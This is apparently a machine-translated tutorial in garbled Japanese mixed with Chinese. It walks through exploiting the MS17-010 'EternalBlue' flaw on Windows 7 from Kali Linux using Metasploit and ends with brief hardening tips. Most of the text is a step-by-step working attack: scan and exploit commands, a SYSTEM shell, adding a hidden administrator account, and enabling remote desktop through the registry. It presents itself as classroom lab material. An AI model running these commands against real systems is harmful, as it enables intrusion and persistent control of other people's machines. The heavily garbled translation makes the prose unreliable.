4分の2019/18 - - -
MS17-010「永遠ブルー」侵入攻撃のWindows7の、リモートログインエフェクトを使用したカーリーLinuxについて。
そして、どのように保護します。
この記事では、教室での実験のために犯罪者ではありません
「永遠ブルー」を導入します
“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。
恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,
只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
2、実験環境の準備
(1)のWindows7オープン445ポートがデフォルトで有効になって
445ポートを開くには、フォルダ内のファイルを共有するためのローカル・エリア・ネットワークの様々なまたは共有プリンタへの容易なアクセスを提供します
(2)Windows7のとカーリーのLinuxはお互いにpingを実行することができ、Windows7のファイアウォールオフ
3、侵入攻撃の実施形態
の入力msfconsoleのカリのLinuxコマンド、ツールMetasploitのを呼び出します
msfconsole
そして、この抜け穴をms17-010検索
search ms17-010
ms17-010脆弱性スキャンモジュールを使用します
use auxiliary/scanner/smb/smb_ms17_010
その後、オプションを見て
show options
ターゲットアドレスを設定するほかに
set rhosts 192.168.247.20
もう一度見て、ターゲットアドレス(のWindows7のIPアドレス)であったと見られるが上がるように設定されています
show options
今、私たちは、この脆弱性スキャンモジュールを起動します
run
ホストはMS17-010攻撃に対して脆弱である可能性があることが見出され、また、Windows7のバージョン情報を示します
192.168.247.20:445 - ホストは、MS17-010の脆弱である可能性が高いです! - Windows 7のProfessionalの7601のService Pack 1つのx64(64ビット)
その後、再び、ちょうど開いた状態に戻り、バックに入るmsfconsole
back
検索ms17-010この抜け穴
search ms17-010
「永遠ブルー」このモジュールのエクスプロイトを使用します
use exploit/windows/smb/ms17_010_eternalblue
次に見ます
show options
ターゲットアドレスを設定するほかに
set rhosts 192.168.247.20
もう一度見て、ターゲットアドレス(のWindows7のIPアドレス)であったと見られるが上がるように設定されています
show options
今、私たちは悪用にこのモジュールを起動しています
exploit
显示出下列这个信息后,enter(回车一下)
[+] 192.168.247.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.247.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.247.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
就进入了Windows7的shell界面
输入一下whoami,查看一下是谁在登录
会发现我们是系统的最高权限账户在登录。攻击完成。
4、kali Linux远程连接win7的攻击
先来查看一下Windows7的远程连接,是没有开启的。
我们可以使用kali linux利用MS17-010实现打开远程连接,并自己创建用户,来远程连接。
首先,我们已经攻击成功,并进入了Windows7的shell界面,然后做以下事情:
开始之前先解决一个乱码问题
(1)添加一个名字为snp的用户,密码snp
net user snp snp /add
(2)提升为管理员权限
net localgroup administrators snp /add
net localgroup administrators #注释:查看一下管理员组有没有自己刚刚添加的用户
(3)利用注册表,打开远程连接
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTsConnections /t REG_DWORD /d 00000000 /f
(4)在kali Linux中使用刚刚添加的用户远程连接Windows7
输入
rdesktop 192.168.247.20:3389
それからちょうど追加したユーザーアカウントでログイン
クリックがされ
、この場合の下に見てしばらく待ちます。
そして、上のリモート接続
のセキュリティ上の問題は:どのように保護するには?
1は、両方のリモート接続機能を使用する場合は、攻撃される恐れが、それはリモート接続の私のポート番号を変更します
Windows7のレジストリの変更のリモート接続ポート番号
(1)を開いてレジストリ
のWindowsは+ regeditと入力rは
((2)このパスを見つけるために、 1)、改変3389 4000
(2)修飾として3389へのパス(2)、4000を見つけ、その後、コンピュータを再起動します。
2は、不謹慎な人々は、エクスプロイト違法なことを行うので、我々は攻撃を避けるために、更新するため、システムを更新する必要が促さ
3を、ファイアウォールを開いて、使用頻度の低いポートを閉じました。
☺ok、ご質問がある、(*¯)交換を検討してください¯)